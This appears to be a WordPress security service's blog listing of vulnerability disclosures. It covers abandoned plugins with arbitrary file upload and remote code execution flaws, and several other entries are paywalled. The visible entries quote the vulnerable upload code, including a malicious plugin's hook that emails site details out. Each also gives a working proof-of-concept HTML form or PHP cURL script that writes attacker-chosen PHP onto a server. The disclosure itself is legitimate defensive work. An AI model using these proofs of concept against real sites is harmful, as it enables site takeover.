13 Feb

Vulnerability Details: Authenticated Persistent Cross-Site Scripting (XSS) Vulnerability in BP Better Messages

This post's content is only accessible to those who have an active account with our service.

If you currently have one then please log in to view the content.

If you don't currently have one, you can get free access to this content, as when you sign up now you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to this post's content).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

13 Feb

Vulnerability Details: Remote Code Execution (RCE) Vulnerability in Stats Wp

Back in October we discussed our spotting a prob for usage of a group of intentionally malicious plugins that someone had created several years ago. What was notable about this was that that whomever was behind those plugins should not have needed to do that to find what websites were using them because the plugins had code in them that sent an email with the address of the website whenever the plugin was activated or deactivated. That would seem to indicate that someone else had found out about these plugins and was trying to exploit them. That is significant because part of the reason that people on the WordPress team have given for not warning people about their use of known vulnerable plugins, is that the say that if they did that more people would be able to exploit the vulnerabilities, which in this case looks to be happening despite there not being evidence we could find that there had been a disclosure that all these plugins were vulnerable. Something we ran across recently seems to provide further evidence that it was not the not the person behind creating those plugins that was doing that probing and therefore someone else had found that vulnerability existed in those plugins.

As part of series of requests probing for vulnerable plugins on one of our websites recently we had a request for /wp-content/plugins/stats-wp/js/luc.ajax.geoip.js, from the plugin Stats Wp. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

In looking at the plugin’s code, it looks to have been another plugin created by the same person as the rest.

Here is the code from one of the previous plugins that notified the creator when the plugin was activated:

function wppopupplugin_activate() { 
$yourip = $_SERVER['REMOTE_ADDR'];
$filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-popup/id.txt';
fwrite($fp, $yourip);
fclose($fp);
add_option('wppopupdored_do_activation_redirect', true);
session_start(); $subj = get_option('siteurl'); $msg = "WP Popup Installed" ; $from = get_option('admin_email'); mail("davidceruliowp@gmail.com", $subj, $msg, $from);
wp_redirect('../wp-admin/admin.php?page=wppopup&action=add');
}

And here it is from Stats Wp:

function analyticstatisticsplugin_activate() { 
$wip = $_SERVER['REMOTE_ADDR'];
$filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/stats-wp/widget.txt';
fwrite($fp, $wip);
fclose($fp);
add_option('analyticstatisticsdored_do_activation_redirect', true);
session_start(); $subj = get_option('siteurl'); $msg = "Stats Installed" ; $from = get_option('admin_email'); mail("joshforyou1@gmail.com", $subj, $msg, $from);
wp_redirect('../wp-admin/admin.php?page=stats-wp/admin/luc_admin.php');
}

The most series part of the malicious code in the previously discussed plugins permitted remote code execution. The contents of the file setup.php in this plugin is nearly identical to the code that did that we showed from a couple of the previous plugins for doing that:

session_start();
$installit = $_POST['install'];
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/stats-wp/install.php', 'w');
$installit = str_replace('\\', '', $installit);
$installit = htmlentities($installit);
fwrite($fp, html_entity_decode($installit));
fclose($fp);
echo $installit;

Proof of Concept

The following proof of concept will place the specified PHP code in to the file install.php in the directory /wp-content/plugins/stats-wp/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/stats-wp/setup.php" method="POST">
<input type="hidden" name="install" value="[PHP code]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
13 Feb

Vulnerability Details: Arbitrary File Upload Vulnerability in Web Tripwire

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor hacking attempts on our websites. Through that we recently came across a request for a file, /web-tripwire/js/swfobject.js, from the plugin Web Tripwire. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Looking at the plugin it has a copy of the library Open Flash Charts, which was discovered to have an arbitrary file upload vulnerability in 2009. In the case of this plugin a new version was never released to fix the issue.

The vulnerability exists at /includes/ofc/ofc_upload_image.php in this plugin. The file takes raw post data and saves it in a file with a name specified by the GET input “name”:

21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
$default_path = '../tmp-upload-images/';
 
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
 
// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] ); 
 
echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
 
//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//
 
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

Proof of Concept

The following proof of concept will place the specified PHP code in to the file test.php in the directory /wp-content/plugins/web-tripwire/includes/tmp-upload-images/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<?php
$curl = curl_init();
$headers = array('Content-Type: text/plain');
$data ="[PHP CODE]";
curl_setopt($curl, CURLOPT_URL, 'http://[path to WordPress]/wp-content/plugins/web-tripwire/includes/ofc/ofc_upload_image.php?name=test.php');
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_exec($curl);
curl_close($curl);
?>
06 Feb

Vulnerability Details: Arbitrary File Upload Vulnerability in SpamTask

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/spamtask/jquery.js, from the plugin SpamTask. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Looking at the plugin it has a copy of the library Open Flash Charts, which was discovered to have an arbitrary file upload vulnerability in 2009. In the case of this plugin a new version was never released to fix the issue.

The vulnerability exists at /chart/php-ofc-library/ofc_upload_image.php in this plugin. The file takes raw post data and saves it in a file with a name specified by the GET input “name”:

21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
$default_path = '../tmp-upload-images/';
 
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
 
// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] ); 
 
echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
 
//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//
 
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

Proof of Concept

The following proof of concept will place the specified PHP code in to the file test.php in the directory /wp-content/plugins/spamtask/chart/tmp-upload-images/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<?php
$curl = curl_init();
$headers = array('Content-Type: text/plain');
$data ="[PHP CODE]";
curl_setopt($curl, CURLOPT_URL, 'http://[path to WordPress]/wp-content/plugins/spamtask/chart/php-ofc-library/ofc_upload_image.php?name=test.php');
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_exec($curl);
curl_close($curl);
?>
06 Feb

Vulnerability Details: Arbitrary File Upload Vulnerability in WP Simple Cart

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/wp-simple-cart/js/json2.js, from the plugin WP Simple Cart. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Seeing as the type of vulnerability that is probably the most likely to be exploited is an arbitrary file upload vulnerability, we started looking over the plugin for that type of vulnerability and we immediately found one.

When a request to the file /request/simple-cart-upload.php includes a file then that file will be uploaded using the function move_uploaded_file() and will be placed in the directory specified by the variable $uploadfile:

24
25
26
27
28
29
30
31
32
33
34
35
36
37
$user_dir = SimpleCartFunctions::TemporaryDir($_GET['prefix']);
 
if (isset($_GET['file'])) {
    $upload_file = explode('.', $_FILES['userfile']['name']);
    $file_name = $_GET['file'] . '.' . $upload_file[count($upload_file)-1];
}
else {
    $file_name = $_FILES['userfile']['name'];
}
 
//ファイルアップロード
$uploaddir = $user_dir . '/';
$uploadfile = $uploaddir . basename($file_name);
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile);

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/plugins/wp-simple-cart/files/0/temporary/, if no files have been uploaded through the plugin before.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/wp-simple-cart/request/simple-cart-upload.php" method="POST" enctype="multipart/form-data">
<input type="file" name="userfile" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

 

03 Feb

Vulnerability Details: Authenticated Persistent Cross-Site Scripting (XSS) in Watu

This post's content is only accessible to those who have an active account with our service.

If you currently have one then please log in to view the content.

If you don't currently have one, you can get free access to this content, as when you sign up now you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to this post's content).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

03 Feb

Vulnerability Details: Cross-Site Request Forgery (CSRF) Vulnerability in Watu

This post's content is only accessible to those who have an active account with our service.

If you currently have one then please log in to view the content.

If you don't currently have one, you can get free access to this content, as when you sign up now you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to this post's content).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

02 Feb

Vulnerability Details: Reflected Cross-Site Scripting (XSS) Vulnerability in Watu

This post's content is only accessible to those who have an active account with our service.

If you currently have one then please log in to view the content.

If you don't currently have one, you can get free access to this content, as when you sign up now you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to this post's content).

If you are a security researcher please contact us to get free access to all of our Vulnerability Details posts.

30 Jan

Vulnerability Details: Arbitrary File Upload Vulnerability in Seo Spy

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/seo-spy-google-wordpress-plugin/ofc/js/swfobject.js, from the plugin Seo Spy. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Looking at the plugin it has a copy of the library Open Flash Charts, which was discovered to have an arbitrary file upload vulnerability in 2009. In the case of this plugin a new version was never released to fix the issue.

The vulnerability exists at /ofc/php-ofc-library/ofc_upload_image.php in this plugin. The file takes raw post data and saves it in a file with a name specified by the GET input “name”:

21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
$default_path = '../tmp-upload-images/';
 
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
 
// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] ); 
 
echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
 
//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//
 
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

Proof of Concept

The following proof of concept will place the specified PHP code in to the file test.php in the directory /wp-content/plugins/seo-spy-google-wordpress-plugin/ofc/tmp-upload-images/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<?php
$curl = curl_init();
$headers = array('Content-Type: text/plain');
$data ="[PHP CODE]";
curl_setopt($curl, CURLOPT_URL, 'http://[path to WordPress]/wp-content/plugins/seo-spy-google-wordpress-plugin/ofc/php-ofc-library/ofc_upload_image.php?name=test.php');
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_exec($curl);
curl_close($curl);
?>